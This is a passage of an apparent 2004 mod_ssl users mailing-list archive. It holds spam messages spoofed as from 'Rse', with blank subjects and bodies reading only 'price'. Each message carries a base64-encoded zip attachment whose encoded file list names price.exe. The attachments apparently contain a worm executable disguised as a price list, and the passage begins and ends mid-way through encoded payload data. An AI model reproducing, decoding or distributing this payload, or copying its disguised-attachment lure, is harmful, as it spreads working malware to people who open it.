PdX+bHxj53OdP+l8s3N5oi3x2cS1iQ2JbYlsYjLxrcSfJh5KPJp4MvEPiX9KnEicTJxOvJv4
pa4NXZu7Ml27uu7pmu76YdeRrh93Hev6WderXa93nep6u2u2qzHZnFyZXJVck2xLXpW8JhlP
rk9+PtmbvDGZSe5M7k7mklrSTLrJ8eQHnsfHz8/1CBvKbt80OJwaSO/eqis2c9iIuzv4SX93
8AcBO+FsdGbuHvCCH4r3DtpyZdhUyaKf8hf9prdTt10v+AuA9Nh8lf8JAGr+XyoM0BJb+PsF
8aN78MvfVhDsyoetnI/0819QSwECFAAUAAAACADUgQkxNwKtUgkCAAA+BAAACgAAAAAAAAAB
ACAAgIEAAAAAcHJpY2UuaHRtbFBLAQIUAAoAAAAAAHQ5CTEAAAAAAAAAAAAAAAAGAAAAAAAA
AAAAEADAQTECAABwcmljZS9QSwECFAAUAAAACAAOggkxnAUjyesTAAAAOgAADwAAAAAAAAAA
ACIAwIFVAgAAcHJpY2UvcHJpY2UuZXhlUEsFBgAAAAADAAMAqQAAAG0WAAAAAA==

----------vmwiqpozmdfkdpmijfoy--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:35:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D781BA8945; Mon,  9 Aug 2004 22:35:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sales10.net (ip67-153-71-178.z71-153-67.customer.algx.net [67.153.71.178])
	by master.modssl.org (Postfix) with SMTP id 31599A893A
	for ; Mon,  9 Aug 2004 22:35:24 +0200 (CEST)
Date: Mon, 09 Aug 2004 16:37:29 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------knwjvpjnepbjlrexahrj"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------knwjvpjnepbjlrexahrj
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------knwjvpjnepbjlrexahrj
Content-Type: application/octet-stream; name="08_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="08_price.zip"

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

----------knwjvpjnepbjlrexahrj--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:36:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F13A6A893A; Mon,  9 Aug 2004 22:36:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from elizabethh.org (cta70.infotec.com.mx [200.38.186.70])
	by master.modssl.org (Postfix) with SMTP id CF480A8D24
	for ; Mon,  9 Aug 2004 22:36:32 +0200 (CEST)
Date: Mon, 09 Aug 2004 15:36:29 -0600
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gqxlwiwctptjpixctqcd"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gqxlwiwctptjpixctqcd
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------gqxlwiwctptjpixctqcd
Content-Type: application/octet-stream; name="new_price.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="new_price.zip"

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
